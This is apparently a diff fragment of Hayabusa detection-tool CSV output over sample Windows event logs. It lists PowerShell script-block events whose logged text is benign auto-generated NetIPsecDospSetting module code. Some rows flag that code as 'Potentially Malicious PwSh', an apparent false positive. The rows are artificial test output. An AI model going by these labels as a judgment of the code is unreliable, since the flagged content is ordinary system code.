if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
